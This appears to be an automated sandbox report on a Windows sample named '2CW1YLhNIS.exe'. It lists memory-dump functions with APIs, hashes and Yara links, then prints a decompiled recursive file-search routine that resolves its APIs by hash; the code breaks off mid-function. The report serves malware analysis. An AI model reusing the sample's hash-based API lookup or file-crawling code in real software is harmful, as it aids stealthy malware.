                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7BCC8, Relevance: 1.5, APIs: 1, Instructions: 47COMMON
                      Download Yara Rule
                      APIs
                      • GetModuleHandleW.KERNEL32(00000000), ref: 02B7BD2E
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: HandleModule
                      • String ID:
                      • API String ID: 4139908857-0
                      • Opcode ID: 58482740d64fc4d9f1cd5058df231b68d51c4bcc63fe7b52c8c816d5ba3ed141
                      • Instruction ID: a1eceee283849e407683def31e80348f74ead02d97a59cb84a5ef5a8f72251b9
                      • Opcode Fuzzy Hash: 58482740d64fc4d9f1cd5058df231b68d51c4bcc63fe7b52c8c816d5ba3ed141
                      • Instruction Fuzzy Hash: 6F11E3B6D002498FCB10CF9AD444BDFFBF4EB88328F14845AD829A7600D375A545CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7DDD8, Relevance: 1.5, APIs: 1, Instructions: 46COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowLongW.USER32(?,?,?), ref: 02B7DE3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: 06acf3a1a462acce61039fdbc3b3e668a1ef6f8404b28d6ebb004f65bcd1909a
                      • Instruction ID: 8b0207ceec99143f0a00c1850a5ce2834d33240065700c2a2a5b39a487bb766d
                      • Opcode Fuzzy Hash: 06acf3a1a462acce61039fdbc3b3e668a1ef6f8404b28d6ebb004f65bcd1909a
                      • Instruction Fuzzy Hash: AC11F2B58003499FDB10CF99D989BDFBBF8EB48324F10845AE965A7241C374AA44CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B7DDE0, Relevance: 1.5, APIs: 1, Instructions: 44COMMON
                      Download Yara Rule
                      APIs
                      • SetWindowLongW.USER32(?,?,?), ref: 02B7DE3D
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID: LongWindow
                      • String ID:
                      • API String ID: 1378638983-0
                      • Opcode ID: cde928bb67dec3b6e6772a29a5921aac7cd6ba5a8e0ab54860313c7fd6e49d5b
                      • Instruction ID: e2cf99b56d5ae4a763524dbad4f0c32f0fcf6eb12bd12ad876c8312ab402e20c
                      • Opcode Fuzzy Hash: cde928bb67dec3b6e6772a29a5921aac7cd6ba5a8e0ab54860313c7fd6e49d5b
                      • Instruction Fuzzy Hash: B811D0B59002099FDB10CF9AD989BDFBBF8EB48324F10845AD969A7240D374A944CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAC290, Relevance: 1.5, APIs: 1, Instructions: 44windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,?,?,?), ref: 05FAC2ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 45b628b8ed6f6d96186e4ae98479cdf12469b2cd6bbe753c55db709041819eb9
                      • Instruction ID: 3ef194b7d7fcaa5f4092694a7024f1103037afda91d327a1fe280f927162091b
                      • Opcode Fuzzy Hash: 45b628b8ed6f6d96186e4ae98479cdf12469b2cd6bbe753c55db709041819eb9
                      • Instruction Fuzzy Hash: 4411D3B68003499FDB10CF99D985BDFBBF8FB48324F10845AE555A7240D379A944CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FAC289, Relevance: 1.5, APIs: 1, Instructions: 43windowCOMMON
                      Download Yara Rule
                      APIs
                      • PostMessageW.USER32(?,?,?,?), ref: 05FAC2ED
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID: MessagePost
                      • String ID:
                      • API String ID: 410705778-0
                      • Opcode ID: 6d30b696e9bc464855f298298908402ba01913461df6d5b1084531611b094f2c
                      • Instruction ID: cb3c20a97cba489b885c39da461faf0943f7cb522ed29170224bae4050f6a2c7
                      • Opcode Fuzzy Hash: 6d30b696e9bc464855f298298908402ba01913461df6d5b1084531611b094f2c
                      • Instruction Fuzzy Hash: 971115B68003488FCB10CF99D585BDFBBF4FB48324F10845AE555A7200D379AA54CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Non-executed Functions

                      Function 008F21B8, Relevance: 3.4, Instructions: 3351COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp Download File
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 70869adcd9217e0232c6c13870d31b881b6bb9ff16a642238f8264f5ac8f69f5
                      • Instruction ID: 22902eb7059317ba57c8f7ad63b7fd09e5644a364542e44936ede0a3907f2e4f
                      • Opcode Fuzzy Hash: 70869adcd9217e0232c6c13870d31b881b6bb9ff16a642238f8264f5ac8f69f5
                      • Instruction Fuzzy Hash: 2543255104FBC26FCB134B742D711E2BFB5AD5322431E49CBD8C08E4A3D2196AAAD776
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA4172, Relevance: 2.8, Strings: 2, Instructions: 281COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: LvH$u"G
                      • API String ID: 0-2980657590
                      • Opcode ID: ddef9239b9d8f1dba344118d5b5116174f3f548e44d38c2832bd97facb5aeeca
                      • Instruction ID: 9e17f3b27404a9345aa57759f6d9a3595fc442f7e040dee2e327aa17a7483557
                      • Opcode Fuzzy Hash: ddef9239b9d8f1dba344118d5b5116174f3f548e44d38c2832bd97facb5aeeca
                      • Instruction Fuzzy Hash: D6B13BB5E052198BCF08CFE5D9455AEFBF2BF88300F14C16AD414AB358E7789942CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA4180, Relevance: 2.8, Strings: 2, Instructions: 258COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: LvH$u"G
                      • API String ID: 0-2980657590
                      • Opcode ID: dbe0c3d78add02f07ee0c4d4488a3f9e00465ffc20a37183d6c742c176cf7abd
                      • Instruction ID: 0cffd094f43ff7842c5cee8b6300143a321bd4222bc47414715cd148134bc4eb
                      • Opcode Fuzzy Hash: dbe0c3d78add02f07ee0c4d4488a3f9e00465ffc20a37183d6c742c176cf7abd
                      • Instruction Fuzzy Hash: 1DB129B5E052198BCF08CFE9C5455AEFBF2BF89300F14D129D414AB358E7789941CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA0570, Relevance: 2.7, Strings: 2, Instructions: 196COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: /BS$/BS
                      • API String ID: 0-4161354524
                      • Opcode ID: c1dec58a4d0775f453bd9dc6f7cdba27cae188870aac9de6d042c8b6e645c8fc
                      • Instruction ID: 31fe2b381e96058003da2765f27fe9566cec26bce2c42966e323d66f4dfe50e8
                      • Opcode Fuzzy Hash: c1dec58a4d0775f453bd9dc6f7cdba27cae188870aac9de6d042c8b6e645c8fc
                      • Instruction Fuzzy Hash: 59910475A15219CFCB04CFA9D5848AEFBF6FF89310F14945AD405AB320D734AA02CF95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA3237, Relevance: 1.5, Strings: 1, Instructions: 205COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      • Opcode ID: faf7ae668898a1535e5fb76dd617b17c022f8b3492bceef3228060eec92f37e9
                      • Instruction ID: 290b635a923711732ebc68ec809ae689dad63ad631ccbde53b5ff5ae93345a7b
                      • Opcode Fuzzy Hash: faf7ae668898a1535e5fb76dd617b17c022f8b3492bceef3228060eec92f37e9
                      • Instruction Fuzzy Hash: D091C0B5E082599BDB04CF65C9806AEFBB2BF89304F28C669D448A7356C7349D42CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA0561, Relevance: 1.4, Strings: 1, Instructions: 191COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: /BS
                      • API String ID: 0-3363854334
                      • Opcode ID: 676a585d20940bc5820daa7cee1bb97d00633b8fd943d52fb5563c9389dcd731
                      • Instruction ID: b8c0e9477c90bd3995bd0d2a366b461accb934dac62bb5de6810aa8b5162841a
                      • Opcode Fuzzy Hash: 676a585d20940bc5820daa7cee1bb97d00633b8fd943d52fb5563c9389dcd731
                      • Instruction Fuzzy Hash: 7981F2B6A15209CFCB04CFA9D5849AEBBF6FF89310F149466D415EB320D738AA02CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA326D, Relevance: 1.4, Strings: 1, Instructions: 185COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      • Opcode ID: 8ab10062d617827db2827847cf61be302e9b4dfd6cb5f567de3d650d080ddb58
                      • Instruction ID: 7cec7d441b79a660eb02bd55f014cba17b89583cac3e367cb32ad25ba4b03aca
                      • Opcode Fuzzy Hash: 8ab10062d617827db2827847cf61be302e9b4dfd6cb5f567de3d650d080ddb58
                      • Instruction Fuzzy Hash: EB81AFB1E081599BDB14CF65C9806AEFBB3BF89304F28C669D408A7356C7349D42CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA32A8, Relevance: 1.4, Strings: 1, Instructions: 172COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: rdO2
                      • API String ID: 0-278582973
                      • Opcode ID: b63d771ed145e9cfa0ef8416ea8900f6fef08f32c881f280d3f60bba6ecbf55a
                      • Instruction ID: ae689dfbf9d45492d253999867bfc2196f87e804f14cdd8e384f995267942fec
                      • Opcode Fuzzy Hash: b63d771ed145e9cfa0ef8416ea8900f6fef08f32c881f280d3f60bba6ecbf55a
                      • Instruction Fuzzy Hash: 78717DB1E081699BDB14CFAAD9805AEFBB3BF89304F24C569D408A7356D7309D42CF61
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA19D8, Relevance: 1.4, Strings: 1, Instructions: 161COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 6F!e
                      • API String ID: 0-827590951
                      • Opcode ID: b1c9b2a8339943159feaad766d9f5aae19cfca2880db63f2f3338a56db8e12aa
                      • Instruction ID: 858cd8848a808eab96f727ab504303f426eff703ffa927d4a6eaf1e96846407f
                      • Opcode Fuzzy Hash: b1c9b2a8339943159feaad766d9f5aae19cfca2880db63f2f3338a56db8e12aa
                      • Instruction Fuzzy Hash: D261D2B6E15609CFCB04CFA9C9809DEFBF6BB89210F25942AD415B7218E3349A41CF65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA19C8, Relevance: 1.4, Strings: 1, Instructions: 158COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: 6F!e
                      • API String ID: 0-827590951
                      • Opcode ID: 04cd6198e6fe850c4465ac7e214a6b18cfcd0c74ea0d67c38997ec84ff9dbb11
                      • Instruction ID: 7025888c1a785b9d8ea93517931e33283344b4273233748b14d5796b2193c64b
                      • Opcode Fuzzy Hash: 04cd6198e6fe850c4465ac7e214a6b18cfcd0c74ea0d67c38997ec84ff9dbb11
                      • Instruction Fuzzy Hash: B761F4B6E156098FCB04CFA9C9819EEFBF6BF88210F14942AD415B7214E3389A01CB65
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA1E01, Relevance: 1.3, Strings: 1, Instructions: 53COMMON
                      Download Yara Rule
                      Strings
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID: (~pg
                      • API String ID: 0-3863253146
                      • Opcode ID: 95506339a40dbf3fe10adafcb2f261f74a2f7e30f740a2bd74d3ef203dcec086
                      • Instruction ID: 224d0a20d228317f4a0558080ae224f8ec13df5ccd5770c19f71b6c43524655b
                      • Opcode Fuzzy Hash: 95506339a40dbf3fe10adafcb2f261f74a2f7e30f740a2bd74d3ef203dcec086
                      • Instruction Fuzzy Hash: 6D11EFB2E156188BEB1CCF6BD94069EFBF3AFC8200F04C57AD509A6264DB3415458F11
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 008F4B40, Relevance: 1.0, Instructions: 974COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp Download File
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: ba578088e183e03e11d64fbae4178932fd10436189f86b712680506a7e8b65b7
                      • Instruction ID: 8396c41ebcc7fab52ce42bc9c42437796785b0b2fe0c76e00eed318f9b871eac
                      • Opcode Fuzzy Hash: ba578088e183e03e11d64fbae4178932fd10436189f86b712680506a7e8b65b7
                      • Instruction Fuzzy Hash: 7972665140EBC61FCB138B742E311E2BFB1AE6321471E58CBC4C1CE4A3E1195AAAD776
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 008F5EC6, Relevance: .6, Instructions: 614COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.648223462.00000000008F2000.00000002.00020000.sdmp, Offset: 008F0000, based on PE: true
                      • Associated: 00000000.00000002.648217225.00000000008F0000.00000002.00020000.sdmp Download File
                      • Associated: 00000000.00000002.648342673.0000000000A0C000.00000002.00020000.sdmp Download File
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: be54f0e0069b838e24de40982a775eac82aaf4a03f0f1a4de7602a6f04dcee8a
                      • Instruction ID: 5081f792b1fbebc439aa817098792dc5539b769ebaabd410468c771beeaed068
                      • Opcode Fuzzy Hash: be54f0e0069b838e24de40982a775eac82aaf4a03f0f1a4de7602a6f04dcee8a
                      • Instruction Fuzzy Hash: 8632662240E3C29FCB138B749CB55D1BFB1AE1732471E45CBD4C18F0A3E6291A5ADB62
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 02B79890, Relevance: .3, Instructions: 265COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.649090135.0000000002B70000.00000040.00000001.sdmp, Offset: 02B70000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 34d90e007110da6eb4b57d5a82b9727d9b4adc83ce05a3b3fe8d7263909875ce
                      • Instruction ID: 57521fb4d3c49baf86d3bd5bf0a7b48801b70a6f664ff4d2316780edbe79037b
                      • Opcode Fuzzy Hash: 34d90e007110da6eb4b57d5a82b9727d9b4adc83ce05a3b3fe8d7263909875ce
                      • Instruction Fuzzy Hash: D1A16132E00619CFCF05DFA5C8845DDBBB2FF85304B1585AAE915BB225EB31A955CF40
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA9E60, Relevance: .2, Instructions: 228COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 4f9fbca0daa5921d878955ae14716514dca844a3064fbd33b7f14a49d06dfa17
                      • Instruction ID: 3d1211d030284f28b3d2a59cfd7abe627cf1f93ee43a9edbad631078fcee2e8a
                      • Opcode Fuzzy Hash: 4f9fbca0daa5921d878955ae14716514dca844a3064fbd33b7f14a49d06dfa17
                      • Instruction Fuzzy Hash: C091E5B6E15209DFCB04CFE5D5814AEFBB6AF89300F10942AD415BB315DB389A42CF91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA9E51, Relevance: .2, Instructions: 217COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 8cdc159ede53c67a8298ef76e981cb7034da2154bce07162a51a5b43b0938e23
                      • Instruction ID: 6bda89c89516768fdb111c59b178dfb8c1317adc7f975e6895f6b952bd1a8e06
                      • Opcode Fuzzy Hash: 8cdc159ede53c67a8298ef76e981cb7034da2154bce07162a51a5b43b0938e23
                      • Instruction Fuzzy Hash: 1F91E4B6E15209DFCB04CFA5D5814AEBBF2BF89300F20942AD415BB315DB389A42CF95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA4668, Relevance: .2, Instructions: 160COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: a0950bb715ec4b064a1a81f7f00fcb21fd60bf2389860fa2812db8708da127a0
                      • Instruction ID: 75122d6843c97a172bcab046f602bee44078d293f44adee04e2d085bfffb5025
                      • Opcode Fuzzy Hash: a0950bb715ec4b064a1a81f7f00fcb21fd60bf2389860fa2812db8708da127a0
                      • Instruction Fuzzy Hash: 6B5168B5E052498FDF08CFA9C445AEEFBF2AF89310F14C425D414AB314D7789A418FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA465A, Relevance: .2, Instructions: 157COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 544258ba600ee852562c6b22ec35996ba31abfc5baafd164816af2b8c47f9828
                      • Instruction ID: e90784673165be65d2c13a813121f1911b93285e7634a278bf30cb3709d3243a
                      • Opcode Fuzzy Hash: 544258ba600ee852562c6b22ec35996ba31abfc5baafd164816af2b8c47f9828
                      • Instruction Fuzzy Hash: C8516AB5E0524A8FDF08CFA9D545AEEFBF2AF89310F14C42AD414AB314D77899418FA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA9750, Relevance: .1, Instructions: 114COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 614730510cec0fd45413c55f46512d41b1980f10e14122b29da876247a703b4d
                      • Instruction ID: 71029e749d0518f0458eeabd901d6026361157e2bff1c3fd1d7c947a2bf55f32
                      • Opcode Fuzzy Hash: 614730510cec0fd45413c55f46512d41b1980f10e14122b29da876247a703b4d
                      • Instruction Fuzzy Hash: 27415AB6E1521EDFCB04CFA6C5445AEFBB6FF88200F10982AD411B7254E7785A41CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA9740, Relevance: .1, Instructions: 112COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 2717c11312309b300b26ab610b0adc2b6c5db66ada139b5cebcfe497d88c4572
                      • Instruction ID: a76c82c69c70927fb5379850a0fb94ece38f6c47b4414ce8e22143870b6f2abd
                      • Opcode Fuzzy Hash: 2717c11312309b300b26ab610b0adc2b6c5db66ada139b5cebcfe497d88c4572
                      • Instruction Fuzzy Hash: 314179B6E1521EDFCB04CFA5C5446AEBBB2FF88200F10982AD411B7254E7785A41CFA1
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA1C30, Relevance: .1, Instructions: 108COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 64d13b5ecded08343ea6f6c484f449f16b314ddd209df04a51b611eb518b778c
                      • Instruction ID: dc7ec22fcb3349719bc966801853c677f20c7c103fa06921bd6b035f058c2aa2
                      • Opcode Fuzzy Hash: 64d13b5ecded08343ea6f6c484f449f16b314ddd209df04a51b611eb518b778c
                      • Instruction Fuzzy Hash: CA4108B1E0560ADBCB08DFA9C5809EEFBF6AF89300F25C06AC415B7214D7349A41CB95
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA17B8, Relevance: .1, Instructions: 107COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: f027e6aef5eeb8115e9a4b35fcdd259fa06b41db36cd6d4c1a6bf089ef719126
                      • Instruction ID: 3c44ead865f979b37e1c2a56aa0bbf098b4e552109fe9aa7332213285bd17822
                      • Opcode Fuzzy Hash: f027e6aef5eeb8115e9a4b35fcdd259fa06b41db36cd6d4c1a6bf089ef719126
                      • Instruction Fuzzy Hash: F741FAB2E0420A9BCB44CFAAC5815AEFBF6BF88300F14D469C455A7254D7389A41CF55
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA17A8, Relevance: .1, Instructions: 107COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 6a9b112340afb9cd99d3df9af8b97fb33c57d2291f2d2bd2397a72da47bf8495
                      • Instruction ID: db3bea660175104ddab5d61daadd70b59f52860048d0b0a1e9a3a5baac99af94
                      • Opcode Fuzzy Hash: 6a9b112340afb9cd99d3df9af8b97fb33c57d2291f2d2bd2397a72da47bf8495
                      • Instruction Fuzzy Hash: C1414BB2E0460A9FCB44CFA9C5419AEFBF2FF99304F24C56AC415A7254D3389A41CF51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA1C20, Relevance: .1, Instructions: 106COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: d4851bc55edbed5223f5ec8f8e29af85130e67993d8b7b4b502ae2ca1ea623dd
                      • Instruction ID: 0758ddcb29a451ce9e9fb72e8373ec1eecce74832daf759fc9e99f043a2bfc91
                      • Opcode Fuzzy Hash: d4851bc55edbed5223f5ec8f8e29af85130e67993d8b7b4b502ae2ca1ea623dd
                      • Instruction Fuzzy Hash: E0413BB2E0564ADBDB04CFA5C5819EEFBF2AF89300F24C16AC415B7214D7349A41CB91
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA3898, Relevance: .1, Instructions: 75COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: 07c60319add16dd43c01d2ad4bee62b1e89a2bb2049c80f5da4161bde482e540
                      • Instruction ID: 26735167c4d2d02b027471070120af069f8f3ea61148bc1e337bf666844d782a
                      • Opcode Fuzzy Hash: 07c60319add16dd43c01d2ad4bee62b1e89a2bb2049c80f5da4161bde482e540
                      • Instruction Fuzzy Hash: E821C1F2D093599FDB49CF7ACC4129EBBF3AFC9200F18C56AD444E7295DA3449018B12
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Function 05FA38E0, Relevance: .1, Instructions: 60COMMON
                      Download Yara Rule
                      Memory Dump Source
                      • Source File: 00000000.00000002.654466792.0000000005FA0000.00000040.00000001.sdmp, Offset: 05FA0000, based on PE: false
                      Similarity
                      • API ID:
                      • String ID:
                      • API String ID:
                      • Opcode ID: b0dd34c8272f7e93b6df177b1de5562dba275cb39890fb7649f45f9a6372bae1
                      • Instruction ID: e6712191164fe641b2df1cd7426641eaeedfd1f390049204b14790dd1440d80f
                      • Opcode Fuzzy Hash: b0dd34c8272f7e93b6df177b1de5562dba275cb39890fb7649f45f9a6372bae1
                      • Instruction Fuzzy Hash: 341159B1E152199BDB48CFAAD9406AEFBF7EBC9210F14C03AD408A7254DB345A058B51
                      Uniqueness

                      Uniqueness Score: -1.00%

                      Analysis Process: 2CW1YLhNIS.exe PID: 6172 Parent PID: 5768 2CW1YLhNIS.exeCOMMON

                      Executed Functions

                      Function 00403D74, Relevance: 14.2, APIs: 4, Strings: 4, Instructions: 200fileCOMMON
                      Download Yara Rule
                      C-Code - Quality: 85%
                      			E00403D74(void* __eflags, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16, intOrPtr _a20, intOrPtr _a24) {
				struct _WIN32_FIND_DATAW _v596;
				void* __ebx;
				void* _t35;
				int _t43;
				void* _t52;
				int _t56;
				intOrPtr _t60;
				void* _t66;
				void* _t73;
				void* _t74;
				WCHAR* _t98;
				void* _t99;
				void* _t100;
				void* _t101;
				WCHAR* _t102;
				void* _t103;
				void* _t104;

				L004067C4(0xa); // executed
				_t72 = 0;
				_t100 = 0x2e;
				_t106 = _a16;
				if(_a16 == 0) {
					L15:
					_push(_a8);
					_t98 = E00405B6F(0, L"%s\\%s", _a4);
					_t104 = _t103 + 0xc;
					if(_t98 == 0) {
						L30:
						__eflags = 0;
						return 0;
					}
					E004031E5(_t72, _t72, 0xd4f4acea, _t72, _t72);
					_t35 = FindFirstFileW(_t98,  &_v596); // executed
					_t73 = _t35;
					if(_t73 == 0xffffffff) {
						L29:
						E00402BAB(_t98);
						goto L30;
					}
					L17:
					while(1) {
						if(E00405D24( &(_v596.cFileName)) >= 3 || _v596.cFileName != _t100) {
							if(_v596.dwFileAttributes != 0x10) {
								L21:
								_push( &(_v596.cFileName));
								_t101 = E00405B6F(_t124, L"%s\\%s", _a4);
								_t104 = _t104 + 0xc;
								if(_t101 == 0) {
									goto L24;
								}
								if(_a12 == 0) {
									E00402BAB(_t98);
									E00403BEF(_t73);
									return _t101;
								}
								_a12(_t101);
								E00402BAB(_t101);
								goto L24;
							}
							_t124 = _a20;
							if(_a20 == 0) {
								goto L24;
							}
							goto L21;
						} else {
							L24:
							E004031E5(_t73, 0, 0xce4477cc, 0, 0);
							_t43 = FindNextFileW(_t73,  &_v596); // executed
							if(_t43 == 0) {
								E00403BEF(_t73); // executed
								goto L29;
							}
							_t100 = 0x2e;
							continue;
						}
					}
				}
				_t102 = E00405B6F(_t106, L"%s\\*", _a4);
				if(_t102 == 0) {
					L14:
					_t100 = 0x2e;
					goto L15;
				}
				E004031E5(0, 0, 0xd4f4acea, 0, 0);
				_t52 = FindFirstFileW(_t102,  &_v596); // executed
				_t74 = _t52;
				if(_t74 == 0xffffffff) {
					L13:
					E00402BAB(_t102);
					_t72 = 0;
					goto L14;
				} else {
					goto L3;
				}
				do {
					L3:
					if((_v596.dwFileAttributes & 0x00000010) == 0) {
						goto L11;
					}
					if(_a24 == 0) {
						L7:
						if(E00405D24( &(_v596.cFileName)) >= 3) {
							L9:
							_push( &(_v596.cFileName));
							_t60 = E00405B6F(_t114, L"%s\\%s", _a4);
							_t103 = _t103 + 0xc;
							_a16 = _t60;
							_t115 = _t60;
							if(_t60 == 0) {
								goto L11;
							}
							_t99 = E00403D74(_t115, _t60, _a8, _a12, 1, 0, 1);
							E00402BAB(_a16);
							_t103 = _t103 + 0x1c;
							if(_t99 != 0) {
								E00402BAB(_t102);
								E00403BEF(_t74);
